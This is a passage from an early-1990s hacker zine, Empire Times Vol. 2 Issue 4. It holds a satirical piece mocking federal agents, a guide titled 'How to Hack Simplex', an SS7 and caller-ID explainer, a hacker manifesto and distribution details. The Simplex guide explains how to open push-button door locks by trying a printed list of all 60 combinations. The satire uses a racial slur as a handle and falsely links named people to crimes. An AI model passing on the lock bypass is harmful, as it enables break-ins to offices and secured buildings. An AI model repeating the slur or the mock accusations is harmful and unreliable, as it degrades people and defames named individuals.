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T H E   E M P I R E   T I M E S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-------------------------------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   The True Hacker Magazine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September 13th, 1994  Issue 4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                                  Author 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. Introduction                                albatross            3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 The Cyber-punk Image                        firefly              7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 AT&amp;T Definity System 75/85                  erudite             15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. How to get free Internet                    Pud C0ur13r         14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. The Octel VMB System                        da telcopimp        20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. My Life as a Narc...                        noelle              10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. Hacking Simplex Locks                       erudite              3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. SS7 / Caller ID Discussion                  grendal              6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. Don't Tell us Our Name                      erudite              3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under: Albat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    Organizer: Arm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 Contributors: Da Telcop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 Erud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 Fire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 Grend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 No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 PuD Cou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Special Thanks: AT&amp;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 Seve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Yes it is true. The Empire Times is back online and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rok -n- roll. The plan is to bring back wha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from the underground world. The Times will go into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of Cellular fone phreaking to the personal live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which we all know and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believe this issue will spark the intrest of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yber-potatoes and those who have yet to realize what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 is time for the Hacker Klan to unite and sh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can expand our realm of control over the grow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love so much. Just think how much money is spent to kee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ystems which (as we all know) never works. I have alway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re is a way for a regular user to access a sys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a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ways use your brain as to the capablities of the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our to stop us, such as the FBI, S.S., and the Mili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btaining 'root' at sites, always remember to hide your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ystem. Check for log files, see what wrappers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 jobs which might be running to catch you. Those who prevail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known as 'Elite'. Those who fail just didn't learn the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de fas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Just remeber that we are building a MAFIA on the InterN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succeed, then YOU know what has to be done. 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s growing and those electrons f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rginia Crue:   If the South is to rise again, Ya'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he ones that'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ryland Crue:   We have more Net access than any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Make sure that ya'll keep it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Smoke it like a Ne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.C. Crue:       I've never see so many hacked outd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PBX's. Keep it that way. Don't 4 get your 9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m only trying to build an Empi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Volume 2, Issue 4, File 1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The Cyberpun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by fire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re's a new flick that they are showing at schools in the are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It's one of those documentaries that is produced exclus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ors that targets a certain culture and proceeds to slander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yberpunk" is such a movie. I had the unfortunate luck to sit through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education program in college last semester. That was b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but then I had to show it to a class this summer and then spark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when I disagreed with the entire theme of the mov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movie "Cyberpunk" was a documentary that showe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continued the media's hype of the so-called "cybercult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m was well-done, and well-organized, but I disagree with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re the film's themes about the "computer gen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k.a.: cyber-punks). Not to mention the fact it was written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-esque" with techno music, rapid-picture imagery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age" fads. This paper will discuss the term "cyberpunk"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observations about this culture, and conclude with the tru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term cyberpunk, coined by William Gibson in his Neuromancer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terary and now, thanks to the media, an overused term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ype of "console cowboy" from a computer programmer to a ma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xplorer, to someone who sees a Gibson-esque futur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to someone who dresses in leather, and carries a digital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punk" usually refers to someone against the current cultural n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ciety. The so-called cyberpunks are considered the small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that is against the current norms of "regular people".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of the matter is that these "cyber-dudes" have grown u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digital games, and electronic tools in the classroom and work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their fault that computers have simplified many redundant ta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? Is it these people's fault that computers now help fly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ars, improve international communication? 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is computer generation is simply the first generation to p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adically new concept of existence. While our forefathers sa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ar perspective, we see them in a virtual reality tha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nlinear environment depending on our virtual vantage point. Tim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y would say this is "consciousness-expansion".  Consider your par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 of television or the superhighway across your home stat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saw it as revolutionary, and possibly frightening that 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"drive" in 6-8 lanes of 55mph traffic across the nation.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the political and Orwellian problems with having a video receiv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rooms that could broadcast political messages. But they ada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w up with it, while their parents looked on in amazement. The s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ith the electronic age. My generation grew up with Atari, Ap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modems. We are used to "driving" with multiple path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-- parallel processing -- our lives, and utilizing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at information or data takes these days to further advance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is illustrates how those in power of any sort -- political, lite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, business -- see this generation, as a band of people who us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live their lives. Well, the television was strang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other, but she adapted -- as my mother grew up with it --, and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of leaders adapt as our generation of people grow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The difference with this computer generation is that we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information at such a rapid pace, that those who look on us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makers and journalists) cannot keep up with it...hence the fear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know. "Cyberpunk" sounds evil. The unknown is evil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body understands the cyber-culture, those that do are therefore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ocietal algebra.  The movie is full of stereotypes. First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yberpunk standard for music. People think techno is the mus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ge because it is fast and computer-generated. False. Grante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like techno like computers, but a history book of 2020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1990s' cyber-culture liking techno in the same way as 18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ns enjoyed the waltz. Outstanding on-line magazine UXU-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philia mentions that the cyber-culture likes any form of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computer-generated tunes. I associate with hackers, and peo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calls "cyberpunks". Our music ranges from hard rock and metal to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tracks to top forty to reggae, and some techno. Yet,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, viewers are led to believe that fast techno is the "mus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people." Granted, a "rave" is an all-night computer-controlled tec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s the climactic part of being a part of a cybercultur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f the entire culture of computer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re was "lotsa leather". Again, another stereotype.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street punk wore combat boots and a leather jacket, but to im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an entire subculture dresses is absurd! To dispel this my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movie on its own level of stereotyping, go to any rave, whic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climactic event in the cyberculture. The fashion ran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me to the ridiculous, from exotic to erotic, from jeans and T-shi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and handcuffs. Mostly people dress the way they go to a dance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they interviewed in the movie were interviewed at a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public place, where they are dressing to make an impressio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one wears leather at a convention or on a documentary tap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an he/she represents the entire culture being profiled,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dresses like that regularly. I know of very few hard-core cyber-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ress that way. I frequently wear shorts, jeans, t-shirts and turtlen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my accessories is a pager and ATM card. Gee. According to Cyberp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 a member of the cyberculture, since I don't own a leather j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long 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ough ranting. I've got better things to do. But I just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hat this flick is shown as an (and meant to be an) "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tool" to college students to show them abou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but portrays them as evil, conniving th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s on next topic: Business Intelligence? or Social Enginee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Volume 2, Issue 4, File 2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T&amp;T Definity System 7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by erud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 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T&amp;T Definity System 7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Communica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Description &amp;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introduce you to the AT&amp;T Definity System 75/85.  Thi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 product of the merging of the AT&amp;T System 75 and System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.  The name Definity came from the two words "definiti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in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also tell you that there are many different communication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. (Merlins, AT&amp;Ts) Many many many, I couldnt name them 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&amp;T systems are nice.  I enjoy working with them, and I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an advanced business communications system. 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tocol (DCP) allows data communication throug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quipment connected to the digital switch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handle data and voice communicati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n handle up to 1600 lines that supports all digital, hyb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alog terminals and equipment.  Up to 400 trunks, and up to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all Distribution (ACD) Agents.  The Data switching capacity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00 digital data endpoints., and 160 integrated and combined pool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igital Data Endpoint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510D Personal Terminal or 515-Type Business Communication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7404D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7406D or 7407D Equipped with optional Data Modu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synchronous Data Units (ADU) (DCE type device that has rs232c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Digital Terminal Data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3270 Data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nternal Dat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runk Data Modules (Mod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rocessor Data Modules (Modu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Port Network (PPN) always provides the swi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(SPE) and port circuits.  An Expansion Port Network (EP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increase line size of any system by allowing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nal port circuits.  The EPN connects to the PPN over a f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 cable that may be up to 1.86 miles remotely situated. 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cated adjacent to the PP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may be arranged stand-alone or you can integrate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network.  You can form these types of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Tandem Tie Trunk Network (TTT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Electronic Tandem Network (ET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Main/Satelli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Distributed Communications System (D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Centralized Attendant Service (C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ted Services Digital Network Primary Rate Interface (ISDN-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for the Definity System to access various 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network services.  With ISDN-PRI the you can access thes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Call by Call Servi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Private Network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Informatio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Call Identific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- Connected Numb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- Connected Party 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- Calling and Called Number Reco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- Calling and Called Party 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ystem is encased in a pair of "cabinets" which have a f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 link between them.  It is also common to have a stack of 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binets" of a smaller size, for different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is a typical multi-carrier system with a Processor Por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N) cabinet and Expansion Port Network (EPN) cab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ant          outside trunks   _____ outsid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s            and lines    /        data transmission equip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                  \    /          analog switch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      fiber optic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 |      connetion     |  |         __ busin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-+---------/~\--------+--+       /  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AT&amp;T    | |   AT&amp;T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EFINITY  | | DEFINITY  +------'                      __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+  SYSTEM   | |  SYSTEM   +--------&lt;&gt;------[audix]    /  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|  75/85    | |  75/85    |   modular data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___________| |__________+|     processor     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  |   |                 |                   |    +'option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|   |                 +-------&lt;&gt;----------+    | computer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/    +-------[]-----+,                     |____|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asynchronou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line     data unit    \__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erminals                  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ot of voice features and services, in fact, too many to lis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a run down on all the interesting and useful features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many Voice Management, Data Management, Network Services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Hospitality Services, and Call Managemen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ttendant Display: Contains useful call related inform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ttendant can use to operate the console more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udio Information Exchange Interface (AUDIX): This interfac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inside system users and remote callers to edit, recieve,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, and forward voic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uthorization Codes: A means to control user privilege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utomatic Incoming Call Display: Shows identity of remote caller and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the display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lass of Restriction: Defines up to 64 classes of user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nferenc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endant Conference: Allows Attendant to construct a confere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rminal Confernce: Allows remote user to construct a confere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ttendant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ata Privacy: This, when activated by user, protects analog data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interrupted by any of the systems overriding features, and de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gain access to, and or superimpose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ata Restriction: This feature is the same as Data Privacy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ssued by the administrator to a certain extension # for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dicated private data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CS Call Forwarding All Calls: This is the voice forward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CS Distinctive Ringing: This is simply a distinctive ring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ial Access: This is simply the package of features that allows any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to dial anyone else, such as the attendant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S1 Tie Trunk Service: This service provides a digital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runk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Voice Grade DS1 Tie Tr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Alternative Voice/Data (AVD) DS1 Tie Tr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Digital Multiplexed Interface (DMI) Tie Tr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Central Office (CO) Tr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ISDN-PRI Tr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Remote Access Tr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Wide Area Telecommunications Service (WATS) Tr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acility Test Calls: Provides voice terminal user who is capab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nd functions that is used for maintenance testing.  Such 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ystem tones, access to specific trun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te: AT&amp;T designed the Facility Test Calls Feature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purposes only, and system maintenance.  Wh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administered, AT&amp;T claims that the custom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all security items, and secure system from unauthoriz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and that all users should be aware of handling acces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AT&amp;T claims they will take no responsibility for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unting: The internal hunting feature is very nice, as you probably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ings down if busy, or if it recieves a dial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formation System Network Interface (ISN): AT&amp;T IS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switched local area network that will link with main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s, personal computers, printers, terminals, storage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munica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egrated Services Digital Network Primary Rate Interface (ISDN-PR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erface allows connection of the system to an ISDN Network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SDN frame format called P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er-PBX Attendant Calls: Positions for more than one branch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ch has a Listed Directory Number (L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odem Pooling: Switches connections of digital data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etwork Access (Private): Connect to the following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Common Control Switching Arrangement (CC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Electronic Tandem Network (ET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Enhanced Private Switched Communications Service (EPS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Tandem Tie Trunk Network (TTT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Software Defined Network (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etwork Access (Public): Access to public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rivacy: Protects from others bridging into thei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mote Access: This lets you access the system remotely, again,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t want to take responsibility for anything that is abus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strictions: There is a large list of restriction features that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ome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ervice Observing: Allows high access users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calls, again, AT&amp;T does not want to take any legal fees on mis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ransfers: Allows any user to do an attendant call transfer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ant's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omes with swithced services software, administrativ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enance software.  All running on a real-tim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witched Services Software: This Software provides all the call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rvices.  This also is responsible for relaying any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ministrative Software: This Software is needed to run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s, an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intenance Software: The Maintenance Softwar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everything run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ccess Code" you will encounter on these systems is a 1, 2, or 3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pound (#) and star (*) keys can be used as the first dig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Below you will see a typical Screen Format taken from one of my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ide you can see what the administration Screens look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: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_____       Lock Messages: _      COR: _     Room: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___________ Security Code: ____   COS: _     Jack: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 Coverage Path: ___              Cable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C Reception? _____  Headset? _  Coverage Msg Retrieval?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C Activation? _  Auto Answer? _        Data Restriction?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 Notification? _        Idle Appearance Preferences? _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L/TEG Call Alerting? _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Data Module? _           Restrict Last Appearance? _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isplay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REVIATED DIA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st1: _____        List2: _____        List3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_______                     6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_______                     7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_______                     8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_______                     9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Maintenance section, where you can see where the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, where all the alarms are sent, prin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different types of al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jor Alarms (Critical Damage, requires immediate atten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inor Alarms (Errors, still operable, requires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arning Alarms (no noticeable degradation of service, not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or IN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log is reported and can be viewed at The Manager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alarm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cr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U     Asynchronous Dat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X   Audio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     Class of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    Class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P     Digital Communications Prot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MI     Digital Multiplex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N     Expansion Por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    Integrated Service Digit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PN     Processor Po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N    Packet Switching Dat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ost of the Tones, mostly either interesting ones or ofte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 the System.  Here are the tones, the frequencies, and the mo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                   Frequency        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---------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Back 3          2225 Hz            300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Back 5          2225 Hz            500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ing Warning       440 Hz             1750 on, 12000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650 on;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                  480 Hz + 620 Hz    500 on, 500 off;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             440 Hz             20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             440 Hz             200 on, 200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dant             440 Hz             200 on, 200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Call          440 Hz             200 on, 200 off, 200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200 off, 20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Back             440 Hz + 480 Hz;   900 on (440 + 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440 Hz             200 on (440) 2900 off;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t At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ification       480 Hz &amp; 440 Hz    100 on (480), 100 on (4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&amp; 480 Hz           100 on sil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dant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Calls,           440 Hz             100 on, 100 off, 10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age              440 Hz             60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rmation          350 Hz + 400 Hz    100 on, 100 off, 100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100 off, 10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                  250 Hz + 400 Hz  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ve Override    440 Hz             300 o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ept             440 Hz &amp; 620 Hz    250 on (4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250 on (620);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back              440 Hz + 480 Hz    1000 on, 3000 off;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                  480                500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is file was based on the statistics for the AT&amp;T De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75/85 (multi-carrier cabinet model) communication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earned something, anywayz, questions comments, system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defaults, where to get manuals,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(armitage@dhp.com) and I will ge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udite (armitage on i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Volume 2, Issue 4, File 3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How to Get a Free Interne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by PuD C0ur13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know the story.  Your just starting out, and you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ount.  And you don't want to pay for one, right?  Well,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ps to getting fre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h bleh, you say.  A freenet?!?!@#$  Well, yes, a freenet.  Why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mailing address, a gopher, maybe usenet, maybe irc, may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ded features.  Heck, on some freenets you get a shell accoun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get a shell account, there are many ways to ge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hell.  Vi, Veronica, gopher, and many other useful little bu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s not for telling how to get shell on a freenet, becaus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another article. But here are some free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.nmc.edu                login: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fn.ysu.edu                login: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net.scri.fsu.edu       login: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net.carleton.edu      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net.victoria.bc.ca    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net.lorain.oberlin.edu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net.hsc.colorado.edu  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cat.missouri.edu       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o.uwasa.fi            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.net                   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augsburg.edu          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.ncm.com               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.ai.mit.edu        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isca.uiowa.edu         login: guest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d.pc.cc.cmu.edu 8888   login: guest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lab.ac.runet.edu       login: bbs   (send mail to 'gabe' to access i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xs.com                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.acc.iit.edu        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augsburg.edu          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bbs.civ.utwente.nl      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ar.bbb.no              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mty.itesm.mx         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rwa.tudelft.nl         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.kaist.ac.kr           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.nsysu.edu.tw           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sun11.cis.nctu.edu.tw  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.aue.com            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.computing.csbsju.edu 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z.rutgers.edu        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fdu.edu               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e.hacks.arizona.edu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.nmsu.edu          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.kotel.co.kr          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iat.org                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bass.st.usm.edu         login: bbs       pass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land.bradley.edu      login: bb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net-in-a.cwru.edu      login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bbs.telecom.uoknor.edu   login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.isca.uiowa.edu        login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2.pc.maricopa.edu 4228   login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itd.com 9999            login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px6.aid.no                login: sk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pad.unc.edu          login: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.calstate.edu           login: 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.unomaha.edu         login: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e.bc.ca                  login: co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ords.bc.ca            login: cos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osy.cns.vt.edu          login: cosy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bs.nersc.gov            login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o.ndsu.nodak.edu        login: new       pass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sun.oulu.fi             login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.city.ac.uk            login: mono      pass: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.dep.anl.gov         login: coc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th.ethz.ch answer at prompts: #         call c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TERMSERV      call av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login:      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 Pen or School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know that in Virginia, there is a semi-internet provid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 Pen.  I call it semi, because only teachers usually get a shell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count will only last for a year, so then you have to subscri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so, your school might have some kind of internet feed.  Try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at in any wa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re isn't much to be said on this.  For Delphi, all you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s a Credit Card Number Generator of some sort.  The ac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ly last about a day, but you can do it as many tim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al CC number, with real name and address,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-legit account, but that will probably only last untill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ing gets his or her bill.  :-)  Experiment.  Call up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, and try carding it.  Chances are,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ome decservers are hooked up to the internet.  The onl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m is to scan for them.  When you do find a decserver or two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w services' command.  If you see anything that is remot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lnet' or 'rlogin' then play around with it.  You might be able to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t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re are two kinds of 1800 Internet.  One is a 1800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ind of like a decserver, except its not.  It lets you telne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erver though, but it only lets you use IP numbers.  I have only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a very few of these "decservers", because 1800 have ANI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telnet gets used to hell, so it doesn't last very long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 knew got called by the authorities for using a 1800 "decser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s not really illegal to use, because you didn't have to hack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into it.  Its just there.  But I wouldn't take that legal ad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other kind of 1800 Internet is where you can call up a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account through the 1800 number.  Delphi has this, as does IIA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.net's number used to be 1800-833-6378, but I hear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Hacking Goo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rute it away baby.  You could also take that delphi accoun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d, finger a site, and brute it that away.  Bruting works about 2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ow, but this script will bru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Unix telneting brute force hack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ai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et this according to the path and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lename where telnet is located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ELNETPATH "/usr/ucb/tel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Following are set to default on a SunOs login format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You may need to change these for other systems.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GINSTRING  "login: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SSSTRING  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OTONESTRING "Last lo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You won't need to edit anything after this point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C(c)  read(readfd,&amp;(c),1)    /* Functions to read and write pi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UTC(c)  write(writefd,&amp;(c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UTS(s)  write(writefd,(s),strlen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*HOST[80];         /* String: Holds connect to host on teln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DBUG = 0;            /* Switch: for Debug/Background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EOO = 0;             /* Switch: Exit after 1st fi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*afilename[80];    /* String: filename to account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*pfilename[80];    /* String: Holds filename to password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*ofilename[80];    /* String: Holds filename to output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account[10];       /* Strings: Hold account/pw for attemp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password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accounts;         /* File poin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passw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ou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ch;                /* General purpo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buf[8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p1[2], p2[2];        /* Streams for the process pipe conn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writefd, readfd;     /* Handles for the pip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andles the death of the telnet process due to a timeout on connection.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tarts a telnet process and reconnects to the host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de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1 == 1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 wait3(NULL, WNOHANG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signal(SIGCLD, de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switch (fork()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cas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dup2(p2[0]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dup2(p1[1]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execl(TELNETPATH, "telnet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printf("Exec Failed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PUTS(H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wait3(NULL, WNOHANG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signal(SIGCLD, de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rror exit routine/Help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p(p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\nUsage: %s &lt;address&gt; -a&lt;account list&gt; -p&lt;password list&gt; -o&lt;output&gt;\n", p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Flags:  -d  (Debug/Run in foreground)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        -1  Exit after first find\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I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(argc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help(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strcpy(HOST, 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for (count = 2; count != argc; count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if (argv[count][0] != '-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printf("\n:: Invalid Command Line ::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help(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ch = argv[count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switch (c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case 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if (!afilename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strcpy(afilename, argv[count] +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case 'p'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if (!pfilename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strcpy(pfilename, argv[count] +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case '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if (!ofilename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strcpy(ofilename, argv[count] +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case 'd'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DBU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case '1'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EOO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printf("\n:: -%c: Unknown option ::\n\n"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help(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while (!afilename[0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printf("AccountList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gets(a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while (!pfilename[0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printf("PasswrdList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gets(p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while (!ofilename[0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printf("Outfil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gets(o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printf("\nHOST: %s", H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printf("\nAccountFile: %s", a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printf("\nPasswrdFile: %s", p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printf("\nOutfile: %s", o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printf("\nDebug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(DBUG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rintf("Of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rintf("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strcpy(buf, H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strcpy(HOST, "open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strcat(HOST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strcat(HOST,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printf(H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(DBUG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if (fork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printf("\nRunning in the background.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printf("PID: %d\n", getpi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signal(SIGCLD, death);           /* Execute death function when child di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up pipes and start telnet chil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(pipe(p2) == -1 || pipe(p1)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printf("Error making pipes.=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readfd = p1[0];  /* read from p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writefd = p2[1]; /* write to p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switch (fork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case -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rintf("Couldnt fork off a chil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case 0 :  /* the chi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dup2(p2[0], 0);  /* read from p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dup2(p1[1], 1);  /* write to p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execl(TELNETPATH, "telnet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printf("Exec faile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default:  /* par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n file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((accounts = fopen(afilename, "r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printf("ERROR: AccountFile &lt;%s&gt; Not found.\n", a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((passwords = fopen(pfilename, "r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printf("ERROR: PasswrdFile &lt;%s&gt; Not Found.\n", p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found = fopen(ofilename, "w+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fprintf(found, "Trying Host: %s\n\n"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fflush(fou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PUTS(HOST);  /* Send open &lt;host&gt; to teln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while (1) {                /* Loop to capture to bu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if (GETC(ch)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if (DBUG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putchar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buf[count++] =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if (ch =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 if (strstr(buf, GOTONESTRING) != NULL) {    /* Check for good ac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fprintf(found, "Account: %sPassword: %s\n", account, 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fflush(fou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printf("Got one!   Account: %sPassword:%s\n", account, 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if (EOO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if (strstr(buf, LOGINSTRING) != NULL) {     /* Check for login prom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strcpy(buf, "XXXXXXX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if (ftell(passwords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   if (fscanf(accounts, "%s", account) == EO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  printf("End of account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   strcat(account,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  if (DBUG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puts(ac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PUTS(ac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 if (strstr(buf, PASSSTRING) != NULL) {    /* Check for passwd prom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strcpy(buf, "XXXXX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if (fscanf(passwords, "%s", password) == EO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   strcpy(password, ac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   rewind(passwor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strcat(password,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if (DBUG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puts(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PUTS(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s That give you shell account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ly ones I know of offhand that you can telnet to and ge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posf.pa.dec.com          login: axpguest  pass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.cse.fau.edu (not shell, but has alot of other nice thin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.com (well, you know, that 5 hours of free internet de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yx.cs.du.edu              login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es.merit.edu           login: um-m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-net.ann-arbor.mi.us      login: new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wants to update, or make this t-phile more informational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s, email roach@tmok.res.wpi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Volume 2, Issue 4, File 4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The Octel VMB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by Da TelcoP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-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++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/--------/ /--------/ /-------------/ /----------/ /-/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/ /----/ / / /---/  / /-----+ +-----/ / /----/___/ / /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/ /    / / / /   /__/       / /       / +---/      / /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/ /    / / / /              / /       / +---/      / /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/ /____/ / / /___/---/      / /       / /____/---/ / /____/---/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/________/ /_________/      /_/       /__________/ /__________/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k|LLa ak-aSKi by Shadowdancer da TelC()PiMP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++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-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el is a type of VMB system, like Meridian Mail or Audix or whatever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l is not well known and I have recently been abusing these system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ere is one thing that I have noticed about these systems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security.  All this inpho was gotten from Octel Vo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anual Release 3.0, a woman who works for Northern Tele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round on systems. So let this voyage into the world of the Octel V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gin.  Ignore all spelling errors, I cant spel worth shit.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ile is: each section that begins with the # symbol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ne of the options from the Main menu, and everything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down level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dialups for this system.  There is the backdoor, the Oc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umber, and then there is the front door.  The Backdoor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ssages and also login to the vmb.  This also goes for the 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The differnece between the front door and the backdo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.  The front door is where you get the personalized gree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door will pick up and say something to the effect of enter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ish to leave a message to or press # to indicat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box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really not much to this part.  I have encountered an oct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door where the box number was the same as the password. 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 system where the password was the whole telephone number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efore it such as the box number was 1234 and the password was 1(pre)1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ust basic defaults but they are what I have encounter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after Loggin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logged in, before you are brought up to the main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given some messages about different things maybe a broadc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admin or notification of automatically deleted messag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ptions you can use at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 Messag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: To hea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plays all new messages since the las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To review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you to play all messages in your mailbox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R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listening to a message you are able to hit 4 and re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message.  Commands used during playback will be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Get Envelo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elope iformation basically gives you the specs on a mess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ell you whether it came from someone who has a mailbox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or whether it came from and outside caller. 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e &amp; time sent, how long it is and if the message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, urgent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Send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6 and then you will be prompted to make a recording o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message so that the person the message is being for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s that it is a forwarded message from you.  After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press #.  If you would like to review your comments pres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 you enter the mailbox or if you don't know that press # to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what it says.  It erases the message after you lis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press 8 record your reply and then press #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you are done recording and then press # again to sen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use record/edit controls during your reply.  The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ed late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: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ust as it says.  This option archives you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 Skip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you are listening to the new messages you can press #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but after you listen to the new messages it plays your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over and then your arch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: Skip to arch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listening to the new messages and you want to sk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d messages just hit ## and you will be take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: Cancel review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option cancels message review and takes you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used during playback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: Rewinds message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: Rewinds to the begining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: Pause.  To unpause press 2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: Fast-forwards message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: Fast-forwards to the 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: Plays the messag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: Gives envelo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: Plays the messag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: Levels volume to norm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: Increases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. Sending messages to other subscribers on the system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f the vmb is quite useful to the actual user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omeone has recieved there messages and read them etc.  They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someother person on that same system without having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ront door.  Here are the options that are used during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e recording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 Stop recording once you are satisfied with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play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: Re-record your message if you are not satisfi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re-recording you can re-record the whole message or jus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t.  Use the Recording controls which will be listed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text.  (NOTE If you are leaving a long messag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y you with two beeps that tell you your time is almost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 have finished recording your message you have the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recording the message or delivering it.  There are several w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destination.  1) box number.  2) subscribers name.  3)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sonal distrubution list.  4) a guest or home mailbox number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 in the text we will discuss how to create distribution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nd home mailboxes.)  When you are going to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instead of the mailbox number, here is the format for ent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-- last,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=2,a,b,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=3,d,e, o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=4,g,h, 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=5,j,k, o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=6,m,n, o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=7,p,q,r,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=8,t,u, o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=9,w,x,y, or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instance, I was on the same system as you, you could s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MP,Telco = 746783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rk the messages as either urgentor private. After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nd before you send the message is when you can mark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cancel the the option by pressing the option numbe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Ur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message conformation you will presented with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of receipt and notification of non-receipt.  Co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is a system generated message which is sent to you after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read your message.  Notification of non-receipt is a system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tells you that the subscriber has not listened to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certain time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Conformation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Notification of non-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ed to you could give the system a certain time to deli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This function is known as Future Delive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Future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lecting this option you will be prompted to enter a dat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ter the actual date or if the message is to be deliver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 you can specify the day of the wee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Specify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elect the month. Jan.= 1 and Sept.=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elect the date.  Between 1 and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et the hour and minutes.  7:00 = 700 and 12:30 = 12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elect 1 for a.m. or 2 for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Specify th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nter the first two letter of the day, using the chart ab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used to enter in the name of the person on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.= 78 and Fri.=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elect the hour and minutes using the same forma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elect the time of day, a.m. or p.m., using the forma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lecting all of the options and getting everything squared a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ready to send the message.  Press # to do this.  After this ent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cording controls are basically identical to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s used while listening to messages. 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few commands that are differ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: Resume the recording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: Edi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: Listen to what has been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: Pause.  Then press 5 to re-record over the undesir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 Check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entered this section from the main menu by pressing 3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he identify the subscriber's mailbox number or ent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All this option does is tell you whether or not the person you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has listened to your mail or not.  If they have not liste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ll the way you will not get the receipt.  The system will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ssage the subscriber has not listened to.  To skip the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# or press * to cancel the Check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 Pers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ection in the main menu there are 6 options you can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Notification On/Off. 2) Administrative options. 3) Greetings.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schedule. 5) Mailbox forwarding. &amp; 6)Security Options. (g00d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levels of menus to this part of the main menu.  Bu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Jane Octel will talk you throught all of the steps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Notifica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basically sets whether system messages are rep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.  1 = On, 2 =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Administrative options. (Under this level you have many many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: Pass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Person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personal password can be up to 15 digits long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admin set what is the minimum length required.  Do no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assword because then the sysadmin is forced to ki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ilbox and start you up a new one.  The sysadmin will no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ppy camper.  But then again sysadmins can eat a dick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Hom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just some password you can give to member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mily.  This just lets them send and receive mail like a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&amp;4: Gues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one of the coolest options of all.  This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ailbox within a mailbox.  You designate a password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friends and he can leave messages to you and you can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to him.  But other users on the system canno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uest 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: Securit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allows someone the option of getting the en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for the messages in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Group Lists (NOTE You can have a maximum of 15 lists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25 mailbo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Crea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Give a two digit number for the list you want to create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to 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ecord the name for the list like "Uhh cool asswip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nter either the mailbox number or the name of the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o review all the names on the list pres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o exit and save the list pres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want to send a message to a distribution list, enter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en you are prompted to enter in the destination after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Edit exis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Delete exis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: Review or renam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Promp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the message prompts.  It is like setting up men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bs.  You can choose novice, skilled, expert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ke setting up menu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Standar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se prompts are your basic prompts wich go over basic op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sending mai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Extende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mpt gives thorough explanations of commands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for use of al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Rapi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mpts cover all features but do not give thorough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: Date and Tim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option tells you the time the message was reciev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turn this on by hitting 1 for on or 2 f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Gr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Personal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is the greeting you get once you have called up the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r you have been transfered to that vmb.  It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for almost all vmbs.  You enter in a message like "U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Da TelcoPiMP, leave a fucking message after the beep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choose a standard greeting wich is the Jane Oc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saying that so and so is not in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Extended absence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reeting just says that you are out for a length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ime and won't be checking messages frequently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block option is on when the extended absence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n your mailbox will not except messages except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sysad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Nam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is a recording of your name which is used to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boxes when someone has entered in the number of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lso used with the standard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Notificati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unction allows your mailbox to call you at certain time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you setup) give you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elect 1 for first schedule 2 for second schedule or 3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hedu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nter the telephone you want the system to call you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You will be asked to set up a start/stop time for the ou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from your mailbox.  You can specify whether it appl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eekdays, weekends or both.  Enter in the tim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as the earlier commands that require you to en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elect the type of message that activates the notification.  1 =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Urgent and 3 = Grou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elect how soon you want the system to call you after it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message.  1 = Hour, 2 = Hours, 3 = 4 hours, 4 = 1 day, 5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and 6 = N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After all of this hassle you can confirm your entries or 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  1 = Confirm and 2 = List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: Mailbox forwarding. (NOTE To have this option work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mailbox created by the sysadmin, for the forwarded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up the system where the mailbox has been created for you and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Establish or change the forwarding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network node address? and the forwarding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bo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ancel mailbox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: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Security options. (huhuhuhuh k00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Turn on access sekurity. (Record your name and th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Turn off access sek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k alittle inpho on this option.  Once access security is on you ar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your name and time.  This is so that the next time you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mb you will hear "The last mailbox access was by &lt;your name&gt; at &lt;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y&gt;."  So the next time you login to the vmb you will hear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orded the inpho at the begining of the last login. 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y inpho you will hear silence.  Ok say you break into a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.  You will have to record that inpho.  But the thing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if the person recorded inpho the last time they accessed their v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are screwed.  AHAH.  Solution.  Login.  Record the inpho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ear whether or not they recorded any inpho last time they wer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your cool crystal clear sounding tape recorder and record their inp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give it.  And then login to the vmb again but this time play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  It may work it may not.  It all depends on the user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hile gives you most of the inphormation you need to mess with an OC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 once you are inside.  I didn't give any elite inpho like how to dial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have to find that out yourself.  Also you can dial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t.  This system can be used to set up 800 meetme's (so can Meri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is system is just as good as Meridian Mail maybe even better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ol inp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el Communications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0 Tasma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pitas, California USA 95035-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8)/321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itage: this shit g0es to y00r d0m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freeze: y0y0y0y0 Dr. Fr33z3 in da hauz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war: uh Hello this is Black Menstraul and I'd like the #5ESS dialu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area so I can take over Bell Atlan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: gimmie root on your system d00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0ach: ypsnarf them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_other_mother_fucka_i_didn't_mention: shouts go out to all yall mof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dancer Da TelcoP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Volume 2, Issue 4, File 5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My Life as a Nar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by No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 all started one bright sunny May morning.  May 30th, 1993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re I was, sitting at my computer terminal innoc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Muse and TinyTim Mush.  Little did I know how much trouble I w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saw something in the reflection of my X-terminal, so I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Standing behind me was a Fed!  My heart stopped for a mo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pound furiously.  "Hell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man was tall, about 6', with dark brown hair and pierc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 "Agent Snorkel, Air Force OSI.  Can I speak with you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?"  I noticed his reflective sunglasses and long black trench c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d memories of something written by Tom Cl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"Uh..."  I looked around for my boss, "Sure.  I guess."  My bo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ff reading another one of his molecular biology text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e walked out to the center courtyard of the Pentagon. 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y day, so Agent Snorkel had to keep brushing his hair out of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t down on one of the benches and he pulled out his badge.  "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law to show you this."  Before I could even read th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blob, he shoved it back inside his pocket.  Opening up his daypl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roceeded to ask me several questions about the internet and cybersp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responded with enthusiasm.  "MUSH programming is a grea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C code!"  He looked at me with an expression that said, "C code?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ew I was safe.  "Yes, I learn so much more about how to do my job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se games.  If only EVERYONE had this opportunity!"  Agent Sno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ded and made a few chicken scratches on a pad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y mistake was in giving the guy too much information.  I c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immer in his eyes when I said, "Oh yeah...these guys would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ess a girl on the net.  They've told me about all SORTS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done which are probably against the law.  Hacking into a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, isn't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nd so began my illustrious career as a n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ot everyone is lucky enough to be considered worthy of pos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.  And certainly not many females!  However, lieing is a skill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d since childhood, when I used to do all sorts of things I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, and came up with a new and believable story on the sp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very singl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'm sure my appearance had something to do with it.  Who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a 21-year-old girl with blonde hair and green eyes was a ha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e who had a top secret security clearance in the Pentag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, those hackers were not easily fooled!  It was tough to re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 to show up at the 2600 meetings in DC wearing my glasses and sweatp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ing and guzzling beer, setting a styrofoam cup or two on fire.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, I found the inner strength required to act completely norm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se fashion gurus and trend s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at's another thing, speaking of urges that were hard to resis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aving fantasies about all of them.  It was all I could do not to r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lothing and throw myself on the first 12-year-old who came withi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of me.  Instead, I had to pretend that I was attracted to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- what a dr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h yeah, and the .gif's.  I had to pretend that the papers I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me had something to do with coding, or UNIX, when ac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, were listings of my pornographic .gif collection.  It w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eat to have hidden cameras ALL OVER MY APARTMENT, if you catch my dr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ay, I keep 